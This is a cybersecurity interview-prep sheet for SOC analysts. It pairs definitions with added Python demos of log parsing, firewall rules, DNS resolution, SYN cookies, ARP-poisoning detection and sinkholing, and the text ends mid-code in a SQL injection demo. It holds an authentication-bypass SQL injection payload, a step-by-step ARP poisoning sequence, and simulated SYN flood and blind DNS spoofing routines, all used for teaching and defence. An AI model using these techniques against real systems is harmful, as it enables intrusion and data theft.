Soc Iq-1

The CIA triad refers to three core components of information security - confidentiality, integrity, and availability. Confidentiality ensures data is only accessed by authorized users, integrity confirms data is accurate and unaltered, and availability ensures authorized users can access data when needed. There should be a balance among these components.

Uploaded by dasawind

1- What is the CIA triad?

There are three core components of the CIA triad:

a. Confidentiality ensures data is properly handled, protected, and accessed by authorized
users only.

b. Integrity confirms data is accurate and not altered by unauthorized people throughout its
lifecycle.

c. Availability ensures authorized users can access data whenever needed. This is done
through properly maintaining and configuring the technical infrastructure and systems that hold
and display the information.

There should be a balance among these three. For example, stronger confidentiality controls
(encryption, extra authentication steps) add processing and operational overhead, which can
reduce availability. Therefore, a balance among these three is important.

***********************************************************************************************************

2- Where can you find event logs in a Windows system?

-In Event Viewer (eventvwr.msc), under Windows Logs (Application, Security, System) and
Applications and Services Logs. The underlying files are .evtx files in
%SystemRoot%\System32\winevt\Logs, and they can also be read from the command line with
wevtutil or the PowerShell cmdlet Get-WinEvent.

3- Where can you find logs in a Linux system?

-Mostly as plain text files in the /var/log directory, for example /var/log/auth.log or
/var/log/secure for authentication events and /var/log/syslog or /var/log/messages for general
system messages. On systemd-based distributions the journal (binary, read with journalctl)
holds the same events and may be the only place some of them are kept.
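Added example, not part of the original notes: what a SOC analyst actually does with the plain-text logs in /var/log. The auth.log lines below are constructed for the example (documentation IP ranges, fictitious hostnames); the script parses them into events and flags a brute-force source and a "failed, then succeeded" login. The regexes assume the standard OpenSSH and sudo message formats.

```python
import re
from collections import Counter

# Constructed sample lines in the syslog format used by /var/log/auth.log (Debian/Ubuntu)
# or /var/log/secure (RHEL). Illustrative data, not a real capture.
SAMPLE_AUTH_LOG = """\
Mar  3 10:14:01 web01 sshd[2201]: Failed password for invalid user admin from 203.0.113.7 port 51234 ssh2
Mar  3 10:14:03 web01 sshd[2201]: Failed password for invalid user admin from 203.0.113.7 port 51236 ssh2
Mar  3 10:14:05 web01 sshd[2203]: Failed password for root from 203.0.113.7 port 51240 ssh2
Mar  3 10:14:07 web01 sshd[2205]: Failed password for root from 203.0.113.7 port 51242 ssh2
Mar  3 10:14:09 web01 sshd[2207]: Failed password for root from 203.0.113.7 port 51244 ssh2
Mar  3 10:15:00 web01 sshd[2210]: Accepted publickey for deploy from 198.51.100.9 port 40022 ssh2: ED25519 SHA256:abc
Mar  3 10:16:30 web01 sshd[2212]: Failed password for deploy from 198.51.100.9 port 40030 ssh2
Mar  3 10:16:35 web01 sshd[2212]: Accepted password for deploy from 198.51.100.9 port 40030 ssh2
Mar  3 10:17:00 web01 sudo:   deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/bin/systemctl restart nginx
"""

# One regex per event type we care about; lines that match none are ignored, not errors.
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port (?P<port>\d+)"
)
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted (?P<method>\S+) for (?P<user>\S+) from (?P<ip>\S+)"
)
SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*COMMAND=(?P<cmd>.*)$")


def parse_auth_log(text):
    """Return parsed events grouped by type: failed / accepted SSH logins and sudo use."""
    events = {"failed": [], "accepted": [], "sudo": []}
    for line in text.splitlines():
        if (m := FAILED_RE.search(line)):
            events["failed"].append(m.groupdict())
        elif (m := ACCEPTED_RE.search(line)):
            events["accepted"].append(m.groupdict())
        elif (m := SUDO_RE.search(line)):
            events["sudo"].append(m.groupdict())
    return events


def brute_force_sources(events, threshold=5):
    """Source IPs with at least `threshold` failed SSH logins."""
    counts = Counter(e["ip"] for e in events["failed"])
    return {ip: n for ip, n in counts.items() if n >= threshold}


def failed_then_success(events):
    """IPs that failed at least once and later got an accepted login: either a typo
    followed by success, or a guess that worked. Worth a look either way."""
    failed_ips = {e["ip"] for e in events["failed"]}
    return sorted({e["ip"] for e in events["accepted"] if e["ip"] in failed_ips})


if __name__ == "__main__":
    ev = parse_auth_log(SAMPLE_AUTH_LOG)
    print("brute force sources:", brute_force_sources(ev))
    print("failed then success:", failed_then_success(ev))
    print("sudo commands:", [(s["user"], s["cmd"]) for s in ev["sudo"]])
```

On a real host the same functions can be fed `open("/var/log/auth.log").read()`; on a journald-only system, `journalctl -u ssh --no-pager -o short` produces the same message text.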


4- What is a three-way handshake?

- A three-way handshake is the method used in a TCP/IP network to create a reliable connection
between a client and a server.

- It is also known as the TCP handshake or SYN, SYN-ACK, ACK: the client sends a SYN
(synchronize) segment carrying its initial sequence number, the server answers with a SYN-ACK
(its own initial sequence number plus an acknowledgment of the client's), and the client
completes the handshake with an ACK. Only then does actual data transfer begin.

Keywords: SYN packets, TCP handshake, local host, server.

***********************************************************************************************************

6. What is a firewall?

A. It is the first line of defense in network security. It monitors incoming and outgoing
network traffic and, using an access control list (ACL), allows or blocks specific traffic
based on a defined set of security rules (source/destination IP, destination port, protocol).
Rules are evaluated in order, and traffic that matches no rule falls through to the default,
which should be deny.

B. A firewall can be hardware, software, or both.

C. Types of Firewalls:
a. Host-based
b. Network-based
c. Next-Generation Firewall (adds application awareness, intrusion prevention and user identity
to the classic port/IP rules)

Keywords: incoming/outgoing traffic, ACL, rules, allow, deny


Video resource: What is a Firewall?
More resources: What Is a Firewall? - Cisco
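Added example, not from the original notes or any firewall vendor: a small first-match ACL evaluator, the logic behind "allow or block based on destination port, IP and protocol". The ACL and the test packets are constructed (a fictitious DMZ web server at 203.0.113.10); the point it shows beyond the text is that rule order and an explicit default deny decide what happens to traffic nobody wrote a rule for.

```python
import ipaddress
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Rule:
    action: str              # "allow" or "deny"
    proto: str               # "tcp", "udp", "icmp" or "any"
    src: str                 # CIDR such as "10.0.0.0/8", or "any"
    dst: str                 # CIDR or "any"
    dport: Optional[int]     # destination port; None means any
    comment: str = ""


@dataclass(frozen=True)
class Packet:
    proto: str
    src: str
    dst: str
    dport: Optional[int] = None


def _in_net(ip, cidr):
    return cidr == "any" or ipaddress.ip_address(ip) in ipaddress.ip_network(cidr, strict=False)


def matches(rule, pkt):
    return (
        rule.proto in ("any", pkt.proto)
        and _in_net(pkt.src, rule.src)
        and _in_net(pkt.dst, rule.dst)
        and (rule.dport is None or rule.dport == pkt.dport)
    )


def evaluate(acl, pkt, default="deny"):
    """First-match semantics, as in iptables chains and router ACLs: the first rule whose
    fields all match decides. Returns (action, index of the deciding rule or None)."""
    for i, rule in enumerate(acl):
        if matches(rule, pkt):
            return rule.action, i
    return default, None          # nothing matched: the implicit default applies


# Constructed ACL for a DMZ web server at 203.0.113.10. Order matters: the specific deny
# for the database port sits before anything broader, and the final catch-all deny makes
# the default-deny posture explicit rather than relying on the implicit default.
ACL = [
    Rule("allow", "tcp", "any", "203.0.113.10/32", 443, "public HTTPS"),
    Rule("allow", "tcp", "any", "203.0.113.10/32", 80, "public HTTP (redirect to HTTPS)"),
    Rule("allow", "tcp", "10.0.0.0/8", "203.0.113.10/32", 22, "SSH from the corporate range only"),
    Rule("deny", "tcp", "any", "203.0.113.0/24", 3306, "never expose MySQL"),
    Rule("allow", "icmp", "10.0.0.0/8", "any", None, "ping from corporate range"),
    Rule("deny", "any", "any", "any", None, "explicit catch-all"),
]

if __name__ == "__main__":
    for p in [Packet("tcp", "198.51.100.5", "203.0.113.10", 443),
              Packet("tcp", "198.51.100.5", "203.0.113.10", 22),
              Packet("tcp", "10.20.1.9", "203.0.113.10", 22),
              Packet("tcp", "10.20.1.9", "203.0.113.10", 3306)]:
        print(p, "->", evaluate(ACL, p))
```

Swap rules 2 and 3 around with a broader allow and the MySQL deny never fires; that ordering mistake is the most common firewall misconfiguration found in reviews.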
5. Can you please tell me what happens when you type google.com and hit enter?

A. The browser needs the IP address of google.com, so it performs a DNS lookup in the
following way:

i. First, the browser checks its own cache of DNS records for previously visited websites.
If the name isn't found, the next step takes place.

ii. Second, the browser asks the operating system, which also maintains a cache of DNS
records (and checks the local hosts file). If it isn't found, the next step takes place.

iii. Third, the query goes to the configured resolver, which on a home network is often the
router; it keeps its own cache and forwards what it doesn't know. If it isn't found, the next
step takes place.

iv. Fourth, the ISP's (or another public) recursive DNS server checks its cache. If it isn't
found, the next step takes place.

v. Fifth, the recursive DNS server resolves the name iteratively on the client's behalf.

vi. Sixth, it asks a root name server, which does not know google.com but refers it to the
.com top-level domain (TLD) name servers. The .com name server refers it to the authoritative
name servers for google.com. The google.com name server finds the matching A/AAAA record and
returns the IP address to the recursive server, which caches it (for the record's TTL) and
sends it back to the client. The browser then opens a TCP connection (and a TLS session for
HTTPS) to that address and sends the HTTP request.

Keywords: DNS, DNS record, query, resolve, cache, TLD


More resources: What happens when you type a URL in the browser and press enter?
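Added example, not part of the original notes: a simulation of the lookup above with layered caches in front of an iterative root -> TLD -> authoritative walk. The zone data, server names and addresses are constructed (example.com with RFC 5737 addresses); real resolvers follow NS and glue records rather than dictionaries, and the router and ISP layers are collapsed into one "recursive" cache. The trace shows what the text describes: a referral at each level on the first lookup, and a cache hit at the first layer on the second.

```python
# Constructed zone data (RFC 5737 documentation addresses). Real resolvers follow NS and
# glue records; here each level is a dict that says who to ask next.
ROOT_HINTS = {"com.": "a.gtld-servers.net."}                        # root: who serves .com
TLD_ZONES = {"com.": {"example.com.": "ns1.example.com."}}           # .com: who serves example.com
AUTH_ZONES = {"ns1.example.com.": {"www.example.com.": "203.0.113.80",
                                   "example.com.": "203.0.113.80"}}


class Resolver:
    """Layered caches (browser, OS stub resolver, recursive resolver) in front of an
    iterative root -> TLD -> authoritative walk. `trace` records each step taken."""

    def __init__(self):
        self.caches = {"browser": {}, "os": {}, "recursive": {}}
        self.trace = []

    def _cached(self, name):
        for layer, cache in self.caches.items():
            if name in cache:
                self.trace.append(f"hit {layer} cache")
                return cache[name]
            self.trace.append(f"miss {layer} cache")
        return None

    def _iterate(self, name):
        labels = name.rstrip(".").split(".")
        tld, zone = labels[-1] + ".", ".".join(labels[-2:]) + "."
        tld_server = ROOT_HINTS.get(tld)
        if tld_server is None:
            self.trace.append(f"root -> no such TLD {tld}")
            return None
        self.trace.append(f"root -> referral to {tld_server}")      # a referral, not an answer
        auth_server = TLD_ZONES[tld].get(zone)
        if auth_server is None:
            self.trace.append(f"{tld_server} -> NXDOMAIN for {zone}")
            return None
        self.trace.append(f"{tld_server} -> referral to {auth_server}")
        answer = AUTH_ZONES[auth_server].get(name)
        self.trace.append(f"{auth_server} -> " + (f"answer {answer}" if answer else "NXDOMAIN"))
        return answer

    def resolve(self, name):
        name = name if name.endswith(".") else name + "."
        self.trace = []
        ip = self._cached(name)
        if ip is None:
            ip = self._iterate(name)
            if ip is not None:
                for cache in self.caches.values():   # every layer caches the answer on the way back
                    cache[name] = ip
        return ip


if __name__ == "__main__":
    r = Resolver()
    print(r.resolve("www.example.com"), r.trace)
    print(r.resolve("www.example.com"), r.trace)
```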
7. What is a proxy or a reverse proxy?

A. A (forward) proxy server is a system that provides a gateway between users and the
internet. It is called an "intermediary" server because it sits between end users and the web
pages they visit online.

B. A (forward) proxy is located at the edge of the network, bordering the internet and the
internal network. There are three main uses of a forward proxy:
a. It improves performance by caching content, which speeds up access and saves bandwidth.
b. It allows multiple clients to route traffic to an external network. For instance, a
business may have a proxy that routes and filters employee traffic to the public Internet,
so the outside world sees the proxy's IP address rather than the client's.
c. It can be configured to block certain URLs, or to allow-list or block-list certain
protocols.

C. A reverse proxy is a system that sits in front of web servers and forwards client
requests to those web servers. It hides the backend servers and commonly terminates TLS,
load-balances across several backends and filters requests (a web application firewall is
typically deployed this way).

Keywords: bandwidth, URL filtering, block, hide/camouflage IP


Video resource: What is a Proxy Server?
More resources: What is a reverse proxy? | Proxy servers explained | Cloudflare
8- What is an IPS / IDS?

************************************************************************************************************

10. What is social engineering?

A. Social engineering is a manipulation technique that exploits human error rather than a
technical flaw. It is mostly done to gain private information, access, or valuables.

B. Social engineering attacks are built around how people think and act. An attacker may
first research the target; once the attacker understands what motivates the user's actions,
they can deceive and manipulate the user effectively.

C. Some types of social engineering: Phishing, Whaling, Diversion Theft, Baiting, Honey Trap,
Pretexting, SMS Phishing (smishing), Scareware.

Keywords: manipulation, exploit, human error


Real-life example: The Beirut Bank Job – Darknet Diaries
More Information: 10 Types of Social Engineering Attacks | CrowdStrike
9. What is phishing? How to prevent phishing attacks?

A. Phishing attacks send fraudulent communications that appear to come from a reliable source.

B. It is usually done through email and exploits human trust rather than a software
vulnerability.

C. It usually aims to get a person to click a malicious link in the email, download an
attachment with malicious intent, or simply perform a certain type of task.

D. The intention of a phishing attack may be to get personal or sensitive information
(credentials in particular), to download and execute a malicious program on the computer, or
to persuade a person to perform some task such as making a monetary transaction.

E. In addition to email security solutions (spam and URL filtering, attachment sandboxing,
SPF/DKIM/DMARC on the organization's own domains), phishing awareness and staff education
are among the most important practices to protect an organization from phishing attacks.
Phishing-resistant multi-factor authentication limits the damage when credentials are stolen
anyway, and an easy way for staff to report suspicious mail gives the SOC early warning.
11. What is the Cyber Kill Chain?

A. The Cyber Kill Chain framework, by Lockheed Martin, describes the typical sequence of
steps attackers take to carry out a successful cyber attack: Reconnaissance, Weaponization,
Delivery, Exploitation, Installation, Command and Control, and Actions on Objectives.

B. It helps to identify where defenses are weak and helps security teams to detect and stop
an attack at each stage of the chain; breaking any one link stops the attack.

Keywords: Lockheed Martin, stages of attack


More resources: Cyber Kill Chain® | Lockheed Martin
12. What is the MITRE ATT&CK framework?

A. Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) was developed by the MITRE
Corporation in 2013 and is built from publicly reported, real-world adversary behaviour.

B. This framework is a common vocabulary for classifying and describing cyberattacks and
intrusions. It provides a structured method to understand attacks, map detections and
coverage against them, and stop them.

C. The Enterprise matrix consists of 14 tactic categories (the adversary's goal, such as
Initial Access, Persistence or Exfiltration), which are then broken down into specific
techniques and sub-techniques (how that goal is achieved), each with detection and mitigation
notes.

Keywords: tactics, techniques, procedures


More resources: MITRE ATT&CK®
ATT&CK - Wikipedia

**********************************************************************************************************

13. What is a DoS/DDoS attack?

A. A denial of service (DoS) or distributed denial of service (DDoS) attack is a malicious
attempt from one or more computers against a single target. The attack aims to overload system
resources (bandwidth, connection tables, CPU, application workers) and prevent legitimate
users from accessing the services on the target computers.

B. While a DoS attack is launched from one point, a DDoS attack comes from numerous
compromised devices (a botnet), often distributed globally, which makes blocking the sources
much harder.

C. A SYN flood, which abuses the TCP handshake, is a common DoS/DDoS attack.
TCP sessions use a three-way handshake when establishing a session between two systems.
These two systems start a session by exchanging three packets (1 SYN - 2 SYN/ACK - 3 ACK).
After a successful handshake, the session is established and the data exchange starts.
In a SYN flood, the attacker sends many SYNs, often from spoofed source addresses, and never
sends the final ACK, leaving each session half open. These half-open sessions fill the
server's listen backlog while it waits for the third packet, so new legitimate connections are
dropped. SYN cookies (the server encodes its state in the sequence number instead of storing
it) are the standard mitigation.

Keywords: syn flood, TCP handshake, resource exhaustion, SYN/ACK packet


More resources: The 3 Types of DDoS Attacks Explained | AT&T Cybersecurity
DDoS Attack Explained

Real-life example: Microsoft Mitigated Record-Breaking 3.47 Tbps DDoS Attack on Azure
Customers
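Added example, not part of the original notes, serving both question 4 (the three-way handshake) and question 13 (SYN flood): a model of the server side of the handshake with both parties' segments, a flood that never sends the third packet, and the SYN-cookie mitigation. Addresses, the backlog size of 4 and the cookie construction are assumptions for the demo; a real SYN cookie also encodes a timestamp and the MSS, and the real backlog is in the hundreds or thousands.

```python
import hmac
import secrets
from collections import OrderedDict


class TcpServer:
    """Model of a listening socket's handshake state. A SYN creates a half-open entry
    (SYN_RECEIVED); the client's final ACK promotes it to ESTABLISHED. The backlog bounds
    how many half-open entries are kept. With syn_cookies=True no state is kept at all:
    the server's initial sequence number is an HMAC of the client's address, so the
    returning ACK (cookie + 1) proves the SYN-ACK really reached that client."""

    def __init__(self, backlog=4, syn_cookies=False):
        self.backlog = backlog
        self.syn_cookies = syn_cookies
        self.secret = secrets.token_bytes(16)
        self.half_open = OrderedDict()   # (ip, port) -> server ISN
        self.established = {}
        self.dropped = 0

    def _cookie(self, client):
        # Simplified SYN cookie (assumption): real ones also encode a timestamp and the MSS.
        mac = hmac.new(self.secret, f"{client[0]}:{client[1]}".encode(), "sha256").digest()
        return int.from_bytes(mac[:4], "big")

    def on_syn(self, client, client_isn):
        """Packet 1 (SYN) arrives; return packet 2 (SYN-ACK), or None if it was dropped."""
        if self.syn_cookies:
            server_isn = self._cookie(client)
        else:
            if len(self.half_open) >= self.backlog:
                self.dropped += 1        # queue full: this SYN, legitimate or not, is lost
                return None
            server_isn = secrets.randbelow(2**32)
            self.half_open[client] = server_isn
        return {"flags": "SYN-ACK", "seq": server_isn, "ack": client_isn + 1}

    def on_ack(self, client, ack):
        """Packet 3 (ACK) arrives; True if the connection becomes ESTABLISHED."""
        expected = self._cookie(client) if self.syn_cookies else self.half_open.get(client)
        if expected is None or ack != expected + 1:
            return False                 # stray or forged ACK
        if not self.syn_cookies:
            del self.half_open[client]
        self.established[client] = expected
        return True


def handshake(server, client, client_isn):
    """A well-behaved client: SYN, receive SYN-ACK, send the ACK."""
    synack = server.on_syn(client, client_isn)
    if synack is None or synack["ack"] != client_isn + 1:
        return False
    return server.on_ack(client, synack["seq"] + 1)


def syn_flood(server, count):
    """The attacker: many SYNs from spoofed sources, never the final ACK."""
    for i in range(count):
        server.on_syn((f"198.51.100.{i % 250 + 1}", 40000 + i), client_isn=i)


def run_demo(syn_cookies=False):
    server = TcpServer(backlog=4, syn_cookies=syn_cookies)
    ok_before = handshake(server, ("10.0.0.5", 51000), 1000)   # normal client, quiet network
    syn_flood(server, 50)
    ok_during = handshake(server, ("10.0.0.6", 51001), 2000)   # legitimate user during the flood
    return {"ok_before": ok_before, "ok_during": ok_during,
            "half_open": len(server.half_open), "dropped": server.dropped}


if __name__ == "__main__":
    print("no mitigation:", run_demo(syn_cookies=False))
    print("SYN cookies:  ", run_demo(syn_cookies=True))
```

Without cookies the four backlog slots are held by spoofed addresses that will never ACK, and the real user's SYN is dropped; with cookies the server stores nothing per SYN, so the flood costs it only the SYN-ACK replies. On Linux the equivalent knobs are net.ipv4.tcp_syncookies and net.ipv4.tcp_max_syn_backlog.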
14. What is ARP poisoning?

A. ARP (Address Resolution Protocol) poisoning is a type of man-in-the-middle attack that can
be used to stop network traffic, change it, or intercept it. ARP has no authentication: any
host on the LAN can claim any IP address, and hosts update their cache on whatever reply they
receive. The sequence of an ARP poisoning attack is below:

● The attacker must have access to the network (the same broadcast domain as the victims).
They scan the network to determine the IP addresses of at least two devices, say a
workstation and a router.

● The attacker uses a spoofing tool, such as Arpspoof, to send out forged ARP replies.
(Tools such as Driftnet only read the intercepted traffic afterwards; they do not spoof.)

● The forged replies advertise that the correct MAC address for both IP addresses
belonging to the router and workstation is the attacker's MAC address. This fools both
the router and workstation into sending their frames to the attacker's machine instead of to
each other.

● The two devices update their ARP cache entries and, from that point onwards,
communicate with the attacker instead of directly with each other. The attacker forwards the
traffic on so nothing appears broken and is now secretly in the middle of all communications.

ARP poisoning diverts traffic whatever the protocol, but the content is readable and
modifiable only when it is sent in clear text, such as HTTP, FTP or Telnet; TLS-protected
sessions are diverted too but cannot be read without the victim accepting an invalid
certificate. Defenses: static ARP entries for gateways, dynamic ARP inspection on switches, and
monitoring for an IP whose MAC changes or one MAC claiming several IPs.
Keywords:
Video resource: ARP Poisoning | Man-in-the-Middle Attack
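Added example, not part of the original notes: the detection side of the attack sequence above, in the style of arpwatch. The ARP packets are constructed (a workstation at 192.168.1.50, a gateway at 192.168.1.1, an attacker at aa:bb:cc:dd:ee:ff); the three checks are the ones a SOC actually alerts on: an IP whose MAC changes, one MAC claiming several IPs, and replies nobody asked for.

```python
from collections import Counter, defaultdict

# Constructed ARP traffic as (timestamp, opcode, sender_ip, sender_mac, target_ip).
# The first four packets are a normal exchange between the workstation (.50) and the
# gateway (.1); then an attacker at aa:bb:cc:dd:ee:ff claims both addresses.
GATEWAY_MAC = "00:11:22:33:44:01"
HOST_MAC = "00:11:22:33:44:50"
ATTACKER_MAC = "aa:bb:cc:dd:ee:ff"
ARP_EVENTS = [
    (0.9, "request", "192.168.1.50", HOST_MAC, "192.168.1.1"),
    (1.0, "reply", "192.168.1.1", GATEWAY_MAC, "192.168.1.50"),
    (1.1, "request", "192.168.1.1", GATEWAY_MAC, "192.168.1.50"),
    (1.2, "reply", "192.168.1.50", HOST_MAC, "192.168.1.1"),
    (5.0, "reply", "192.168.1.1", ATTACKER_MAC, "192.168.1.50"),   # forged
    (5.0, "reply", "192.168.1.50", ATTACKER_MAC, "192.168.1.1"),   # forged
    (7.0, "reply", "192.168.1.1", ATTACKER_MAC, "192.168.1.50"),   # re-sent to keep caches poisoned
]


def detect_arp_poisoning(events, known=None):
    """arpwatch-style checks over a stream of ARP packets. `known` is an optional
    inventory of ip -> mac (e.g. the gateway) to trust from the start.
    Returns a list of (timestamp, kind, detail) alerts."""
    bindings = dict(known or {})         # ip -> mac we currently believe
    ips_per_mac = defaultdict(set)       # mac -> ips it has claimed
    pending = set()                      # (requester_ip, asked_for_ip) seen on the wire
    alerts = []
    for ts, op, sip, smac, tip in events:
        if op == "request":
            pending.add((sip, tip))
            continue
        # 1. Flip-flop: an IP we already know now answers with a different MAC.
        old = bindings.get(sip)
        if old and old != smac:
            alerts.append((ts, "mac_change", f"{sip}: {old} -> {smac}"))
        bindings[sip] = smac
        # 2. One MAC claiming several IPs: the signature of a MITM between two hosts.
        ips_per_mac[smac].add(sip)
        if len(ips_per_mac[smac]) > 1:
            alerts.append((ts, "multi_ip_mac", f"{smac} claims {sorted(ips_per_mac[smac])}"))
        # 3. Reply nobody asked for (gratuitous or forged); genuine replies match a request.
        if (tip, sip) in pending:
            pending.discard((tip, sip))
        else:
            alerts.append((ts, "unsolicited_reply", f"{sip} is-at {smac}, sent to {tip}"))
    return alerts


def summarize(alerts):
    return dict(Counter(kind for _, kind, _ in alerts))


if __name__ == "__main__":
    for alert in detect_arp_poisoning(ARP_EVENTS, known={"192.168.1.1": GATEWAY_MAC}):
        print(alert)
```

Gratuitous ARP from a host that just booted or failed over (VRRP, DHCP renewals) triggers check 3 legitimately, so in practice the unsolicited-reply alert is a low-severity signal and the MAC change on a known gateway is the one that pages someone.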
15. What is DNS poisoning?

DNS (Domain Name System) poisoning attacks modify or corrupt DNS data, typically by getting a
forged answer into a resolver's cache (cache poisoning). Attackers attempt to replace the IP
address in the DNS record with a malicious website's IP address. If successful, every user of
that resolver is sent to the malicious site instead of the one they intend to visit, for as
long as the poisoned record's TTL lasts. Resolvers defend against it by accepting only replies
that match an outstanding query (random transaction ID and source port), and DNSSEC lets them
verify the answer's signature.
The same idea, applied deliberately by the defenders, is DNS sinkholing (question 16): the
organization's own resolver answers queries for known-bad domains with a controlled address.

Keywords:
More resources: What is DNS Spoofing and Cache Poisoning?
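Added example, not part of the original notes: why cache poisoning is a guessing game and what decides the odds. The resolver below accepts a reply only if its transaction ID, destination port and question match a query in flight; a blind attacker who cannot see the query sprays forged replies. With the old behaviour (sequential IDs, fixed port 53) the second guess lands; with random IDs and ports it does not. Names and addresses are constructed, and the model ignores timing and the authoritative server's real reply racing the forgeries.

```python
import secrets


class ResolverCache:
    """The checks a resolver must apply before trusting a DNS reply. Queries in flight
    are keyed by (transaction ID, source port, question name); a reply that matches none
    of them is discarded. A blind attacker cannot see the query, so it has to guess."""

    def __init__(self, random_ids=True):
        self.random_ids = random_ids
        self._next_id = 1
        self.outstanding = set()
        self.cache = {}

    def send_query(self, qname):
        if self.random_ids:
            txid = secrets.randbelow(65536)              # 16-bit transaction ID
            sport = 1024 + secrets.randbelow(64512)       # randomized source port (1024..65535)
        else:
            txid, sport = self._next_id, 53               # old behaviour: sequential ID, fixed port
            self._next_id += 1
        self.outstanding.add((txid, sport, qname))
        return txid, sport

    def receive_reply(self, txid, dport, qname, answer):
        key = (txid, dport, qname)
        if key not in self.outstanding:
            return False                                  # nothing in flight matches: drop
        self.outstanding.remove(key)
        self.cache[qname] = answer                        # first matching reply wins
        return True


def blind_spoof(victim, qname, evil_ip, guesses):
    """Attacker who cannot see the query floods forged replies, one per txid guess, all
    aimed at port 53 (the only port it can bet on if source ports are not randomized)."""
    for txid in range(guesses):
        if victim.receive_reply(txid, 53, qname, evil_ip):
            return True
    return False


def demo(random_ids):
    resolver = ResolverCache(random_ids=random_ids)
    qname = "www.example.com."
    txid, sport = resolver.send_query(qname)
    poisoned = blind_spoof(resolver, qname, "198.51.100.66", guesses=1000)
    # The genuine answer from the authoritative server arrives afterwards; if the forgery
    # already matched, the real reply is dropped and the bad record stays until its TTL expires.
    genuine_accepted = resolver.receive_reply(txid, sport, qname, "203.0.113.80")
    return poisoned, genuine_accepted, resolver.cache.get(qname)


if __name__ == "__main__":
    print("predictable IDs, port 53:", demo(random_ids=False))
    print("random IDs and ports:    ", demo(random_ids=True))
```

Randomizing ID and port gives roughly 2^16 * 2^16 possibilities per query, which is why the 2008 fix made blind poisoning impractical; it is still only probabilistic, and DNSSEC validation is what makes a forged answer verifiably wrong rather than merely unlikely.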

************************************************************************************************************

17. What is OWASP Top 10?

A. The Open Worldwide Application Security Project (OWASP, formerly the Open Web Application
Security Project) is a nonprofit organization focused on improving software security.

B. The OWASP Top 10 lists the ten most critical web application security risks, updated every
few years from vulnerability data and industry surveys.

C. It is a great, free foundational resource for developers when writing code, performing
tests with these Top 10 risks in mind, and building secure applications/programs.

The 2021 edition:

1. Broken Access Control
2. Cryptographic Failures
3. Injection
4. Insecure Design
5. Security Misconfiguration
6. Vulnerable and Outdated Components
7. Identification and Authentication Failures
8. Software and Data Integrity Failures
9. Security Logging and Monitoring Failures
10. Server-Side Request Forgery

Keywords:
More resources: OWASP Top Ten
16- What is DNS Sinkhole?

DNS sinkholing is a mechanism aimed at protecting users by intercepting DNS requests for
known malicious or unwanted domains and returning a false, or rather controlled, IP address.
The controlled IP address points to a sinkhole server defined by the DNS sinkhole
administrator.

This technique can be used to prevent hosts from connecting to or communicating with known
malicious destinations such as a botnet C&C server. Because every sinkholed query is logged
together with the client that sent it, the sinkhole also produces a list of hosts that are
probably infected, which is often its main value to the SOC.
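Added example, not part of the original notes: a sinkholing resolver with exact and wildcard (whole-zone) blocklist entries, a stand-in for normal recursion, and the per-client hit log that turns the sinkhole into an infected-host list. The blocklist domains, the sinkhole address 10.99.0.1 and the upstream stub are all constructed for the example.

```python
from collections import defaultdict

SINKHOLE_IP = "10.99.0.1"   # constructed: an internal host that logs connections and serves nothing

# Constructed blocklist (fictitious names). "*." entries cover every subdomain of a zone,
# which is how DGA families and wildcard C2 infrastructure are usually listed.
BLOCKLIST = {
    "c2.bad-example.net.",
    "updates.malware-example.org.",
    "*.dga-example.com.",
}


class SinkholeResolver:
    def __init__(self, blocklist, upstream):
        self.exact = {d for d in blocklist if not d.startswith("*.")}
        # "*.dga-example.com." -> ".dga-example.com." so str.endswith does the matching
        self.suffixes = tuple(d[1:] for d in blocklist if d.startswith("*."))
        self.upstream = upstream          # callable(qname) -> ip; stands in for normal recursion
        self.hits = defaultdict(list)     # client_ip -> sinkholed names: the infected-host list

    def is_blocked(self, qname):
        return qname in self.exact or qname.endswith(self.suffixes)

    def resolve(self, client_ip, qname):
        qname = qname if qname.endswith(".") else qname + "."
        if self.is_blocked(qname):
            self.hits[client_ip].append(qname)
            return SINKHOLE_IP
        return self.upstream(qname)

    def infected_hosts(self):
        """Which clients asked for sinkholed names, and which names."""
        return {ip: sorted(set(names)) for ip, names in self.hits.items()}


def upstream_stub(qname):
    # Constructed stand-in for real recursive resolution.
    return "203.0.113.80"


def run_demo():
    resolver = SinkholeResolver(BLOCKLIST, upstream_stub)
    queries = [("10.1.1.5", "www.example.com"), ("10.1.1.5", "c2.bad-example.net"),
               ("10.1.1.7", "x7f3a.dga-example.com"), ("10.1.1.7", "dga-example.com")]
    answers = [(client, q, resolver.resolve(client, q)) for client, q in queries]
    return answers, resolver.infected_hosts()


if __name__ == "__main__":
    answers, infected = run_demo()
    for a in answers:
        print(a)
    print("probably infected:", infected)
```

Two caveats a practitioner wants: the wildcard entry deliberately does not match the zone apex (dga-example.com itself), so list the apex separately if it is also bad; and sinkholing only catches hosts that use the corporate resolver, so outbound port 53/853 and DNS-over-HTTPS to anything but that resolver have to be blocked at the firewall or malware simply asks someone else.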

*****************************************************************************************************

18. What is SQL injection?

A. Applications that build Structured Query Language (SQL) statements from user input can be
vulnerable to SQL injection. An attacker can cause the database to perform actions that the
developer did not intend, like revealing, modifying, or deleting sensitive data.

B. In an SQL injection attack, the attacker supplies SQL syntax in an input field (a login
form or search box, for example) that is concatenated into the query. A classic payload makes
the WHERE clause always true, such as ' OR 1=1 --, so a login check passes without a valid
password. SQL injection is how the RockYou breach happened.

C. SQL injection is in the list of OWASP Top 10 application security risks (under Injection).

D. Parameterized queries (prepared statements) are the main protection from SQL injection,
because they keep data separate from the SQL structure; input validation and a least-privilege
database account are supporting controls.

Keywords: inject a script, input validation, parameterized queries


More resources: What is SQL Injection and How to Prevent It?
Real-life example: RockYou – Darknet Diaries
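Added example, not part of the original notes or of any real application: the vulnerable login query beside its parameterized form, run against an in-memory SQLite database with two constructed users (the password_hash values are placeholders, not real hashes). It shows the always-true payload from the text and, going one step further, a UNION payload that pulls the stored hashes out through the same field.

```python
import sqlite3


def setup_db():
    """In-memory SQLite with two constructed users. The password_hash values are
    placeholders, not the output of a real password hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users (username, password_hash) VALUES (?, ?)",
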